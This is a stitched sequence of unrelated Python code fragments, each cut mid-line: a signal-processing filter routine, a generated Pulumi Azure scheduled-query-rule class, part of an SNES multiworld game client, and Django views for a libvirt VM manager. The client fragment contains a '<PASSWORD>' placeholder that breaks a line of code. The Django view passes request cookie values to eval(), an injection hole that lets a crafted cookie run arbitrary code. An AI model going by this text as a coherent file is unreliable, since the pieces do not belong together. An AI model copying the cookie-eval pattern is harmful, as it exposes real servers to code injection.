periodize_filter_fourier(phi_f_fr[log2_F_phi_diff][pad_diff][0],
nperiods=2**sub))
# initial lowpass
phi_f_fr = {0: {}}
# expand dim to multiply along freq like (2, 32, 4) * (32, 1)
phi_f_fr[0][0] = [gauss_1d(N_init, sigma_low, P_max=P_max, eps=eps)[:, None]]
compute_all_subsamplings(phi_f_fr, pad_diff=0, log2_F_phi=log2_F,
log2_F_phi_diff=0)
# reusable
common_kw = dict(normalize=normalize_fr, P_max=P_max, eps=eps)
# lowpass filters at all possible input lengths ##########################
pads_iterated = []
for J_pad_fr in list(J_pad_frs.values())[::-1]:
if J_pad_fr == -1:
continue
# avoid recomputation
if J_pad_fr in pads_iterated:
continue
pads_iterated.append(J_pad_fr)
# validate J_pad_fr
if sampling_phi_fr == 'resample' and not zero_stride_globally:
# guaranteed by design:
# - 'resample': total_conv_stride_over_U1 >= log2_F
# - J_pad_fr = max(, total_conv_stride_over_U1)
# exception is `not average_fr and aligned`, but we force
# `max(, log2_F)` in frontend
assert J_pad_fr >= log2_F, (J_pad_fr, log2_F)
pad_diff = J_pad_frs_max_init - J_pad_fr
if sampling_phi_fr == 'resample':
phi_f_fr[0][pad_diff] = [
gauss_1d(2**J_pad_fr, sigma_low, **common_kw)[:, None]]
# dedicate separate filters for *subsampled* as opposed to *trimmed*
# inputs (i.e. `n1_fr_subsample` vs `J_pad_frs_max_init - J_pad_fr`)
compute_all_subsamplings(phi_f_fr, pad_diff, log2_F_phi=log2_F,
log2_F_phi_diff=0)
elif sampling_phi_fr == 'recalibrate':
# These won't differ from plain subsampling but we still
# build each `log2_F_phi_diff` separately with its own subsampling
# to avoid excessive bookkeeping.
# `phi[::factor] == gauss_1d(N // factor, sigma_low * factor)`
# when not aliased.
| |
<filename>sdk/python/pulumi_azure_native/insights/v20210201preview/scheduled_query_rule.py
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['ScheduledQueryRuleArgs', 'ScheduledQueryRule']
@pulumi.input_type
class ScheduledQueryRuleArgs:
def __init__(__self__, *,
criteria: pulumi.Input['ScheduledQueryRuleCriteriaArgs'],
enabled: pulumi.Input[bool],
resource_group_name: pulumi.Input[str],
scopes: pulumi.Input[Sequence[pulumi.Input[str]]],
actions: Optional[pulumi.Input['ActionsArgs']] = None,
auto_mitigate: Optional[pulumi.Input[bool]] = None,
check_workspace_alerts_storage_configured: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
evaluation_frequency: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[Union[str, 'Kind']]] = None,
location: Optional[pulumi.Input[str]] = None,
mute_actions_duration: Optional[pulumi.Input[str]] = None,
override_query_time_range: Optional[pulumi.Input[str]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
severity: Optional[pulumi.Input[float]] = None,
skip_query_validation: Optional[pulumi.Input[bool]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
target_resource_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
window_size: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ScheduledQueryRule resource.
:param pulumi.Input['ScheduledQueryRuleCriteriaArgs'] criteria: The rule criteria that defines the conditions of the scheduled query rule.
:param pulumi.Input[bool] enabled: The flag which indicates whether this scheduled query rule is enabled. Value should be true or false
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[Sequence[pulumi.Input[str]]] scopes: The list of resource id's that this scheduled query rule is scoped to.
:param pulumi.Input['ActionsArgs'] actions: Actions to invoke when the alert fires.
:param pulumi.Input[bool] auto_mitigate: The flag that indicates whether the alert should be automatically resolved or not. The default is true. Relevant only for rules of the kind LogAlert.
:param pulumi.Input[bool] check_workspace_alerts_storage_configured: The flag which indicates whether this scheduled query rule should be stored in the customer's storage. The default is false. Relevant only for rules of the kind LogAlert.
:param pulumi.Input[str] description: The description of the scheduled query rule.
:param pulumi.Input[str] display_name: The display name of the alert rule
:param pulumi.Input[str] evaluation_frequency: How often the scheduled query rule is evaluated represented in ISO 8601 duration format. Relevant and required only for rules of the kind LogAlert.
:param pulumi.Input[Union[str, 'Kind']] kind: Indicates the type of scheduled query rule. The default is LogAlert.
:param pulumi.Input[str] location: The geo-location where the resource lives
:param pulumi.Input[str] mute_actions_duration: Mute actions for the chosen period of time (in ISO 8601 duration format) after the alert is fired. Relevant only for rules of the kind LogAlert.
:param pulumi.Input[str] override_query_time_range: If specified then overrides the query time range (default is WindowSize*NumberOfEvaluationPeriods). Relevant only for rules of the kind LogAlert.
:param pulumi.Input[str] rule_name: The name of the rule.
:param pulumi.Input[float] severity: Severity of the alert. Should be an integer between [0-4]. Value of 0 is severest. Relevant and required only for rules of the kind LogAlert.
:param pulumi.Input[bool] skip_query_validation: The flag which indicates whether the provided query should be validated or not. The default is false. Relevant only for rules of the kind LogAlert.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[Sequence[pulumi.Input[str]]] target_resource_types: List of resource type of the target resource(s) on which the alert is created/updated. For example if the scope is a resource group and targetResourceTypes is Microsoft.Compute/virtualMachines, then a different alert will be fired for each virtual machine in the resource group which meet the alert criteria. Relevant only for rules of the kind LogAlert
:param pulumi.Input[str] window_size: The period of time (in ISO 8601 duration format) on which the Alert query will be executed (bin size). Relevant and required only for rules of the kind LogAlert.
"""
pulumi.set(__self__, "criteria", criteria)
pulumi.set(__self__, "enabled", enabled)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "scopes", scopes)
if actions is not None:
pulumi.set(__self__, "actions", actions)
if auto_mitigate is not None:
pulumi.set(__self__, "auto_mitigate", auto_mitigate)
if check_workspace_alerts_storage_configured is not None:
pulumi.set(__self__, "check_workspace_alerts_storage_configured", check_workspace_alerts_storage_configured)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if evaluation_frequency is not None:
pulumi.set(__self__, "evaluation_frequency", evaluation_frequency)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if location is not None:
pulumi.set(__self__, "location", location)
if mute_actions_duration is not None:
pulumi.set(__self__, "mute_actions_duration", mute_actions_duration)
if override_query_time_range is not None:
pulumi.set(__self__, "override_query_time_range", override_query_time_range)
if rule_name is not None:
pulumi.set(__self__, "rule_name", rule_name)
if severity is not None:
pulumi.set(__self__, "severity", severity)
if skip_query_validation is not None:
pulumi.set(__self__, "skip_query_validation", skip_query_validation)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if target_resource_types is not None:
pulumi.set(__self__, "target_resource_types", target_resource_types)
if window_size is not None:
pulumi.set(__self__, "window_size", window_size)
@property
@pulumi.getter
def criteria(self) -> pulumi.Input['ScheduledQueryRuleCriteriaArgs']:
"""
The rule criteria that defines the conditions of the scheduled query rule.
"""
return pulumi.get(self, "criteria")
@criteria.setter
def criteria(self, value: pulumi.Input['ScheduledQueryRuleCriteriaArgs']):
pulumi.set(self, "criteria", value)
@property
@pulumi.getter
def enabled(self) -> pulumi.Input[bool]:
"""
The flag which indicates whether this scheduled query rule is enabled. Value should be true or false
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: pulumi.Input[bool]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group. The name is case insensitive.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def scopes(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
The list of resource id's that this scheduled query rule is scoped to.
"""
return pulumi.get(self, "scopes")
@scopes.setter
def scopes(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "scopes", value)
@property
@pulumi.getter
def actions(self) -> Optional[pulumi.Input['ActionsArgs']]:
"""
Actions to invoke when the alert fires.
"""
return pulumi.get(self, "actions")
@actions.setter
def actions(self, value: Optional[pulumi.Input['ActionsArgs']]):
pulumi.set(self, "actions", value)
@property
@pulumi.getter(name="autoMitigate")
def auto_mitigate(self) -> Optional[pulumi.Input[bool]]:
"""
The flag that indicates whether the alert should be automatically resolved or not. The default is true. Relevant only for rules of the kind LogAlert.
"""
return pulumi.get(self, "auto_mitigate")
@auto_mitigate.setter
def auto_mitigate(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_mitigate", value)
@property
@pulumi.getter(name="checkWorkspaceAlertsStorageConfigured")
def check_workspace_alerts_storage_configured(self) -> Optional[pulumi.Input[bool]]:
"""
The flag which indicates whether this scheduled query rule should be stored in the customer's storage. The default is false. Relevant only for rules of the kind LogAlert.
"""
return pulumi.get(self, "check_workspace_alerts_storage_configured")
@check_workspace_alerts_storage_configured.setter
def check_workspace_alerts_storage_configured(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "check_workspace_alerts_storage_configured", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the scheduled query rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
The display name of the alert rule
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="evaluationFrequency")
def evaluation_frequency(self) -> Optional[pulumi.Input[str]]:
"""
How often the scheduled query rule is evaluated represented in ISO 8601 duration format. Relevant and required only for rules of the kind LogAlert.
"""
return pulumi.get(self, "evaluation_frequency")
@evaluation_frequency.setter
def evaluation_frequency(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "evaluation_frequency", value)
@property
@pulumi.getter
def kind(self) -> Optional[pulumi.Input[Union[str, 'Kind']]]:
"""
Indicates the type of scheduled query rule. The default is LogAlert.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: Optional[pulumi.Input[Union[str, 'Kind']]]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="muteActionsDuration")
def mute_actions_duration(self) -> Optional[pulumi.Input[str]]:
"""
Mute actions for the chosen period of time (in ISO 8601 duration format) after the alert is fired. Relevant only for rules of the kind LogAlert.
"""
return pulumi.get(self, "mute_actions_duration")
@mute_actions_duration.setter
def mute_actions_duration(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mute_actions_duration", value)
@property
@pulumi.getter(name="overrideQueryTimeRange")
def override_query_time_range(self) -> Optional[pulumi.Input[str]]:
"""
If specified then overrides the query time range (default is WindowSize*NumberOfEvaluationPeriods). Relevant only for rules of the kind LogAlert.
"""
return pulumi.get(self, "override_query_time_range")
@override_query_time_range.setter
def override_query_time_range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "override_query_time_range", value)
@property
@pulumi.getter(name="ruleName")
def rule_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the rule.
"""
return pulumi.get(self, "rule_name")
@rule_name.setter
def rule_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rule_name", value)
@property
@pulumi.getter
def severity(self) -> Optional[pulumi.Input[float]]:
"""
Severity of the alert. Should be an integer between [0-4]. Value of 0 is severest. Relevant and required only for rules of the kind LogAlert.
"""
return pulumi.get(self, "severity")
@severity.setter
def severity(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "severity", value)
@property
@pulumi.getter(name="skipQueryValidation")
def skip_query_validation(self) -> Optional[pulumi.Input[bool]]:
"""
The flag which indicates whether the provided query should be validated or not. The default is false. Relevant only for rules of the | |
0x7E0000 - WRAM_START):
cmd += b'\xA9' # LDA
cmd += bytes([byte])
cmd += b'\x8F' # STA.l
cmd += bytes([ptr & 0xFF, (ptr >> 8) & 0xFF, (ptr >> 16) & 0xFF])
cmd += b'\xA9\x00\x8F\x00\x2C\x00\x68\xEB\x68\x28\x6C\xEA\xFF\x08'
PutAddress_Request['Space'] = 'CMD'
PutAddress_Request['Operands'] = ["2C00", hex(len(cmd)-1)[2:], "2C00", "1"]
try:
if ctx.snes_socket is not None:
await ctx.snes_socket.send(json.dumps(PutAddress_Request))
if ctx.snes_socket is not None:
await ctx.snes_socket.send(cmd)
except websockets.ConnectionClosed:
return False
else:
PutAddress_Request['Space'] = 'SNES'
try:
#will pack those requests as soon as qusb2snes actually supports that for real
for address, data in write_list:
PutAddress_Request['Operands'] = [hex(address)[2:], hex(len(data))[2:]]
if ctx.snes_socket is not None:
await ctx.snes_socket.send(json.dumps(PutAddress_Request))
if ctx.snes_socket is not None:
await ctx.snes_socket.send(data)
except websockets.ConnectionClosed:
return False
return True
finally:
ctx.snes_request_lock.release()
def snes_buffered_write(ctx : Context, address, data):
if len(ctx.snes_write_buffer) > 0 and (ctx.snes_write_buffer[-1][0] + len(ctx.snes_write_buffer[-1][1])) == address:
ctx.snes_write_buffer[-1] = (ctx.snes_write_buffer[-1][0], ctx.snes_write_buffer[-1][1] + data)
else:
ctx.snes_write_buffer.append((address, data))
async def snes_flush_writes(ctx : Context):
if not ctx.snes_write_buffer:
return
await snes_write(ctx, ctx.snes_write_buffer)
ctx.snes_write_buffer = []
async def send_msgs(websocket, msgs):
if not websocket or not websocket.open or websocket.closed:
return
await websocket.send(json.dumps(msgs))
async def server_loop(ctx: Context, address=None):
ctx.ui_node.send_connection_status(ctx)
cached_address = None
if ctx.server and ctx.server.socket:
ctx.ui_node.log_error('Already connected')
return
if address is None: # set through CLI or BMBP
address = ctx.server_address
if address is None: # see if this is an old connection
await asyncio.sleep(0.5) # wait for snes connection to succeed if possible.
rom = "".join(chr(x) for x in ctx.rom) if ctx.rom is not None else None
try:
servers = cached_address = Utils.persistent_load()["servers"]
address = servers[rom] if rom is not None and rom in servers else servers["default"]
except Exception as e:
logging.debug(f"Could not find cached server address. {e}")
# Wait for the user to provide a multiworld server address
if not address:
logging.info('Please connect to a multiworld server.')
ctx.ui_node.poll_for_server_ip()
return
address = f"ws://{address}" if "://" not in address else address
port = urllib.parse.urlparse(address).port or 38281
ctx.ui_node.log_info('Connecting to multiworld server at %s' % address)
try:
socket = await websockets.connect(address, port=port, ping_timeout=None, ping_interval=None)
ctx.server = Endpoint(socket)
ctx.ui_node.log_info('Connected')
ctx.server_address = address
ctx.ui_node.send_connection_status(ctx)
async for data in ctx.server.socket:
for msg in json.loads(data):
cmd, args = (msg[0], msg[1]) if len(msg) > 1 else (msg, None)
await process_server_cmd(ctx, cmd, args)
ctx.ui_node.log_warning('Disconnected from multiworld server, type /connect to reconnect')
except WebUI.WaitingForUiException:
pass
except ConnectionRefusedError:
if cached_address:
ctx.ui_node.log_error('Unable to connect to multiworld server at cached address. '
'Please use the connect button above.')
else:
ctx.ui_node.log_error('Connection refused by the multiworld server')
except (OSError, websockets.InvalidURI):
ctx.ui_node.log_error('Failed to connect to the multiworld server')
except Exception as e:
ctx.ui_node.log_error('Lost connection to the multiworld server, type /connect to reconnect')
if not isinstance(e, websockets.WebSocketException):
logging.exception(e)
finally:
ctx.awaiting_rom = False
ctx.auth = None
ctx.items_received = []
ctx.locations_info = {}
ctx.server_version = (0, 0, 0)
if ctx.server and ctx.server.socket is not None:
await ctx.server.socket.close()
ctx.server = None
ctx.server_task = None
if ctx.server_address:
ctx.ui_node.log_info(f"... reconnecting in {RECONNECT_DELAY}s")
ctx.ui_node.send_connection_status(ctx)
asyncio.create_task(server_autoreconnect(ctx))
async def server_autoreconnect(ctx: Context):
# unfortunately currently broken. See: https://github.com/prompt-toolkit/python-prompt-toolkit/issues/1033
# with prompt_toolkit.shortcuts.ProgressBar() as pb:
# for _ in pb(range(100)):
# await asyncio.sleep(RECONNECT_DELAY/100)
await asyncio.sleep(RECONNECT_DELAY)
if ctx.server_address and ctx.server_task is None:
ctx.server_task = asyncio.create_task(server_loop(ctx))
async def process_server_cmd(ctx: Context, cmd, args):
if cmd == 'RoomInfo':
ctx.ui_node.log_info('--------------------------------')
ctx.ui_node.log_info('Room Information:')
ctx.ui_node.log_info('--------------------------------')
version = args.get("version", "unknown Bonta Protocol")
if isinstance(version, list):
ctx.server_version = tuple(version)
version = ".".join(str(item) for item in version)
else:
ctx.server_version = (0, 0, 0)
ctx.ui_node.log_info(f'Server protocol version: {version}')
if "tags" in args:
ctx.ui_node.log_info("Server protocol tags: " + ", ".join(args["tags"]))
if args['password']:
ctx.ui_node.log_info('Password required')
if "forfeit_mode" in args: # could also be version > 2.2.1, but going with implicit content here
logging.info("Forfeit setting: "+args["forfeit_mode"])
logging.info("Remaining setting: "+args["remaining_mode"])
logging.info(f"A !hint costs {args['hint_cost']} points and you get {args['location_check_points']}"
f" for each location checked.")
ctx.hint_cost = int(args['hint_cost'])
ctx.check_points = int(args['location_check_points'])
ctx.forfeit_mode = args['forfeit_mode']
ctx.remaining_mode = args['remaining_mode']
ctx.ui_node.send_game_info(ctx)
if len(args['players']) < 1:
ctx.ui_node.log_info('No player connected')
else:
args['players'].sort()
current_team = -1
ctx.ui_node.log_info('Connected players:')
for team, slot, name in args['players']:
if team != current_team:
ctx.ui_node.log_info(f' Team #{team + 1}')
current_team = team
ctx.ui_node.log_info(' %s (Player %d)' % (name, slot))
await server_auth(ctx, args['password'])
elif cmd == 'ConnectionRefused':
if 'InvalidPassword' in args:
ctx.ui_node.log_error('Invalid password')
ctx.password = <PASSWORD>
await server_auth(ctx, True)
if 'InvalidRom' in args:
if ctx.snes_socket is not None and not ctx.snes_socket.closed:
asyncio.create_task(ctx.snes_socket.close())
raise Exception(
'Invalid ROM detected, please verify that you have loaded the correct rom and reconnect your snes (/snes)')
if 'SlotAlreadyTaken' in args:
Utils.persistent_store("servers", "default", ctx.server_address)
Utils.persistent_store("servers", "".join(chr(x) for x in ctx.rom), ctx.server_address)
raise Exception('Player slot already in use for that team')
if 'IncompatibleVersion' in args:
raise Exception('Server reported your client version as incompatible')
raise Exception('Connection refused by the multiworld host')
elif cmd == 'Connected':
Utils.persistent_store("servers", "default", ctx.server_address)
Utils.persistent_store("servers", "".join(chr(x) for x in ctx.rom), ctx.server_address)
ctx.team, ctx.slot = args[0]
ctx.player_names = {p: n for p, n in args[1]}
msgs = []
if ctx.locations_checked:
msgs.append(['LocationChecks', [Regions.location_table[loc][0] for loc in ctx.locations_checked]])
if ctx.locations_scouted:
msgs.append(['LocationScouts', list(ctx.locations_scouted)])
if msgs:
await ctx.send_msgs(msgs)
if ctx.finished_game:
await send_finished_game(ctx)
elif cmd == 'ReceivedItems':
start_index, items = args
if start_index == 0:
ctx.items_received = []
elif start_index != len(ctx.items_received):
sync_msg = [['Sync']]
if ctx.locations_checked:
sync_msg.append(['LocationChecks', [Regions.location_table[loc][0] for loc in ctx.locations_checked]])
await ctx.send_msgs(sync_msg)
if start_index == len(ctx.items_received):
for item in items:
ctx.items_received.append(ReceivedItem(*item))
ctx.watcher_event.set()
elif cmd == 'LocationInfo':
for location, item, player in args:
if location not in ctx.locations_info:
replacements = {0xA2: 'Small Key', 0x9D: 'Big Key', 0x8D: 'Compass', 0x7D: 'Map'}
item_name = replacements.get(item, get_item_name_from_id(item))
ctx.ui_node.log_info(
f"Saw {color(item_name, 'red', 'bold')} at {list(Regions.location_table.keys())[location - 1]}")
ctx.locations_info[location] = (item, player)
ctx.watcher_event.set()
elif cmd == 'ItemSent':
player_sent, location, player_recvd, item = args
ctx.ui_node.notify_item_sent(ctx.player_names[player_sent], ctx.player_names[player_recvd],
get_item_name_from_id(item), get_location_name_from_address(location),
player_sent == ctx.slot, player_recvd == ctx.slot)
item = color(get_item_name_from_id(item), 'cyan' if player_sent != ctx.slot else 'green')
player_sent = color(ctx.player_names[player_sent], 'yellow' if player_sent != ctx.slot else 'magenta')
player_recvd = color(ctx.player_names[player_recvd], 'yellow' if player_recvd != ctx.slot else 'magenta')
logging.info(
'%s sent %s to %s (%s)' % (player_sent, item, player_recvd, color(get_location_name_from_address(location),
'blue_bg', 'white')))
elif cmd == 'ItemFound':
found = ReceivedItem(*args)
ctx.ui_node.notify_item_found(ctx.player_names[found.player], get_item_name_from_id(found.item),
get_location_name_from_address(found.location), found.player == ctx.slot)
item = color(get_item_name_from_id(found.item), 'cyan' if found.player != ctx.slot else 'green')
player_sent = color(ctx.player_names[found.player], 'yellow' if found.player != ctx.slot else 'magenta')
logging.info('%s found %s (%s)' % (player_sent, item, color(get_location_name_from_address(found.location),
'blue_bg', 'white')))
elif cmd == 'Missing':
if 'locations' in args:
locations = json.loads(args['locations'])
for location in locations:
ctx.ui_node.log_info(f'Missing: {location}')
ctx.ui_node.log_info(f'Found {len(locations)} missing location checks')
elif cmd == 'Hint':
hints = [Utils.Hint(*hint) for hint in args]
for hint in hints:
ctx.ui_node.send_hint(ctx.player_names[hint.finding_player], ctx.player_names[hint.receiving_player],
get_item_name_from_id(hint.item), get_location_name_from_address(hint.location),
hint.found, hint.finding_player == ctx.slot, hint.receiving_player == ctx.slot,
hint.entrance if hint.entrance else None)
item = color(get_item_name_from_id(hint.item), 'green' if hint.found else 'cyan')
player_find = color(ctx.player_names[hint.finding_player],
'yellow' if hint.finding_player != ctx.slot else 'magenta')
player_recvd = color(ctx.player_names[hint.receiving_player],
'yellow' if hint.receiving_player != ctx.slot else 'magenta')
text = f"[Hint]: {player_recvd}'s {item} is " \
f"at {color(get_location_name_from_address(hint.location), 'blue_bg', 'white')} " \
f"in {player_find}'s World"
if hint.entrance:
text += " at " + color(hint.entrance, 'white_bg', 'black')
logging.info(text + (f". {color('(found)', 'green_bg', 'black')} " if hint.found else "."))
elif cmd == "AliasUpdate":
ctx.player_names = {p: n for p, n in args}
elif cmd == 'Print':
ctx.ui_node.log_info(args)
elif cmd == 'HintPointUpdate':
ctx.hint_points = args[0]
else:
logging.debug(f"unknown command {args}")
def get_tags(ctx: Context):
tags = ['Berserker']
if ctx.found_items:
tags.append('FoundItems')
return tags
async def server_auth(ctx: Context, password_requested):
if password_requested and not ctx.password:
ctx.ui_node.log_info('Enter the password required to join this game:')
ctx.password = await console_input(ctx)
if ctx.rom is None:
ctx.awaiting_rom = True
ctx.ui_node.log_info('No ROM detected, awaiting snes connection to authenticate to the multiworld server (/snes)')
return
ctx.awaiting_rom = False
ctx.auth = ctx.rom.copy()
await ctx.send_msgs([['Connect', {
'password': ctx.password, 'rom': ctx.auth, 'version': Utils._version_tuple, 'tags': get_tags(ctx),
'uuid': Utils.get_unique_identifier()
}]])
async def console_input(ctx : Context):
ctx.input_requests += 1
return await ctx.input_queue.get()
async def connect(ctx: Context, address=None):
await ctx.disconnect()
ctx.server_task = asyncio.create_task(server_loop(ctx, address))
from MultiServer import CommandProcessor, mark_raw
class ClientCommandProcessor(CommandProcessor):
def __init__(self, ctx: Context):
self.ctx = ctx
def output(self, text: str):
self.ctx.ui_node.log_info(text)
def _cmd_exit(self) -> bool:
"""Close connections and client"""
self.ctx.exit_event.set()
return True
@mark_raw
def _cmd_snes(self, snes_address: str = "") -> bool:
"""Connect to a snes. Optionally include network address of a snes to connect to, otherwise show available devices"""
self.ctx.snes_reconnect_address = None
asyncio.create_task(snes_connect(self.ctx, snes_address if snes_address else self.ctx.snes_address))
return True
def _cmd_snes_close(self) -> bool:
| |
from string import letters, digits
from random import choice
from django.shortcuts import render_to_response
from django.http import HttpResponseRedirect, HttpResponse
from django.template import RequestContext
from django.utils.translation import ugettext_lazy as _
import json
from instance.models import Instance
from servers.models import Compute
from vrtManager.instance import wvmInstances, wvmInstance
from libvirt import libvirtError, VIR_DOMAIN_XML_SECURE
from webvirtmgr.settings import TIME_JS_REFRESH, QEMU_KEYMAPS
from shared.helpers import render
from Queue import Queue, Empty
from threading import Thread
class Worker(Thread):
"""Thread executing tasks from a given tasks queue"""
def __init__(self, tasks):
Thread.__init__(self)
self.tasks = tasks
self.daemon = True
self.start()
def run(self):
while not self.tasks.empty():
try:
func, args, kargs = self.tasks.get(False)
try:
func(*args, **kargs)
except Exception, e:
print e
self.tasks.task_done()
except Empty:
pass
class WorkerPool:
"""Pool of threads consuming tasks from a queue"""
def __init__(self, num_threads):
self.tasks = Queue()
self.num_threads = num_threads
def add_task(self, func, *args, **kargs):
"""Add a task to the queue"""
self.tasks.put((func, args, kargs))
def run_tasks(self):
"""Wait for completion of all the tasks in the queue"""
for _ in range(self.num_threads):
Worker(self.tasks)
self.tasks.join()
def instusage(request, host_id, vname):
"""
Return instance usage
"""
cookies = {}
datasets = {}
datasets_rd = []
datasets_wr = []
json_blk = []
cookie_blk = {}
blk_error = False
datasets_rx = []
datasets_tx = []
json_net = []
cookie_net = {}
net_error = False
networks = None
disks = None
compute = Compute.objects.get(id=host_id)
try:
conn = wvmInstance(compute.hostname,
compute.login,
compute.password,
compute.type,
vname)
status = conn.get_status()
if status == 3 or status == 5:
networks = conn.get_net_device()
disks = conn.get_disk_device()
except libvirtError:
status = None
if status and status == 1:
try:
blk_usage = conn.disk_usage()
cpu_usage = conn.cpu_usage()
net_usage = conn.net_usage()
conn.close()
except libvirtError:
blk_usage = None
cpu_usage = None
net_usage = None
try:
cookies['cpu'] = request._cookies['cpu']
except KeyError:
cookies['cpu'] = None
try:
cookies['hdd'] = request._cookies['hdd']
except KeyError:
cookies['hdd'] = None
try:
cookies['net'] = request._cookies['net']
except KeyError:
cookies['net'] = None
if cookies['cpu'] == '{}' or not cookies['cpu'] or not cpu_usage:
datasets['cpu'] = [0]
else:
datasets['cpu'] = eval(cookies['cpu'])
if len(datasets['cpu']) > 10:
while datasets['cpu']:
del datasets['cpu'][0]
if len(datasets['cpu']) == 10:
break
if len(datasets['cpu']) <= 9:
datasets['cpu'].append(int(cpu_usage['cpu']))
if len(datasets['cpu']) == 10:
datasets['cpu'].append(int(cpu_usage['cpu']))
del datasets['cpu'][0]
cpu = {
'labels': [""] * 10,
'datasets': [
{
"fillColor": "rgba(241,72,70,0.5)",
"strokeColor": "rgba(241,72,70,1)",
"pointColor": "rgba(241,72,70,1)",
"pointStrokeColor": "#fff",
"data": datasets['cpu']
}
]
}
for blk in blk_usage:
if cookies['hdd'] == '{}' or not cookies['hdd'] or not blk_usage:
datasets_wr.append(0)
datasets_rd.append(0)
else:
datasets['hdd'] = eval(cookies['hdd'])
try:
datasets_rd = datasets['hdd'][blk['dev']][0]
datasets_wr = datasets['hdd'][blk['dev']][1]
except:
blk_error = True
if not blk_error:
if len(datasets_rd) > 10:
while datasets_rd:
del datasets_rd[0]
if len(datasets_rd) == 10:
break
if len(datasets_wr) > 10:
while datasets_wr:
del datasets_wr[0]
if len(datasets_wr) == 10:
break
if len(datasets_rd) <= 9:
datasets_rd.append(int(blk['rd']) / 1048576)
if len(datasets_rd) == 10:
datasets_rd.append(int(blk['rd']) / 1048576)
del datasets_rd[0]
if len(datasets_wr) <= 9:
datasets_wr.append(int(blk['wr']) / 1048576)
if len(datasets_wr) == 10:
datasets_wr.append(int(blk['wr']) / 1048576)
del datasets_wr[0]
disk = {
'labels': [""] * 10,
'datasets': [
{
"fillColor": "rgba(83,191,189,0.5)",
"strokeColor": "rgba(83,191,189,1)",
"pointColor": "rgba(83,191,189,1)",
"pointStrokeColor": "#fff",
"data": datasets_rd
},
{
"fillColor": "rgba(249,134,33,0.5)",
"strokeColor": "rgba(249,134,33,1)",
"pointColor": "rgba(249,134,33,1)",
"pointStrokeColor": "#fff",
"data": datasets_wr
},
]
}
json_blk.append({'dev': blk['dev'], 'data': disk})
cookie_blk[blk['dev']] = [datasets_rd, datasets_wr]
for net in net_usage:
if cookies['net'] == '{}' or not cookies['net'] or not net_usage:
datasets_rx.append(0)
datasets_tx.append(0)
else:
datasets['net'] = eval(cookies['net'])
try:
datasets_rx = datasets['net'][net['dev']][0]
datasets_tx = datasets['net'][net['dev']][1]
except:
net_error = True
if not net_error:
if len(datasets_rx) > 10:
while datasets_rx:
del datasets_rx[0]
if len(datasets_rx) == 10:
break
if len(datasets_tx) > 10:
while datasets_tx:
del datasets_tx[0]
if len(datasets_tx) == 10:
break
if len(datasets_rx) <= 9:
datasets_rx.append(int(net['rx']) / 1048576)
if len(datasets_rx) == 10:
datasets_rx.append(int(net['rx']) / 1048576)
del datasets_rx[0]
if len(datasets_tx) <= 9:
datasets_tx.append(int(net['tx']) / 1048576)
if len(datasets_tx) == 10:
datasets_tx.append(int(net['tx']) / 1048576)
del datasets_tx[0]
network = {
'labels': [""] * 10,
'datasets': [
{
"fillColor": "rgba(83,191,189,0.5)",
"strokeColor": "rgba(83,191,189,1)",
"pointColor": "rgba(83,191,189,1)",
"pointStrokeColor": "#fff",
"data": datasets_rx
},
{
"fillColor": "rgba(151,187,205,0.5)",
"strokeColor": "rgba(151,187,205,1)",
"pointColor": "rgba(151,187,205,1)",
"pointStrokeColor": "#fff",
"data": datasets_tx
},
]
}
json_net.append({'dev': net['dev'], 'data': network})
cookie_net[net['dev']] = [datasets_rx, datasets_tx]
data = json.dumps({'status': status, 'cpu': cpu, 'hdd': json_blk, 'net': json_net})
else:
datasets = [0] * 10
cpu = {
'labels': [""] * 10,
'datasets': [
{
"fillColor": "rgba(241,72,70,0.5)",
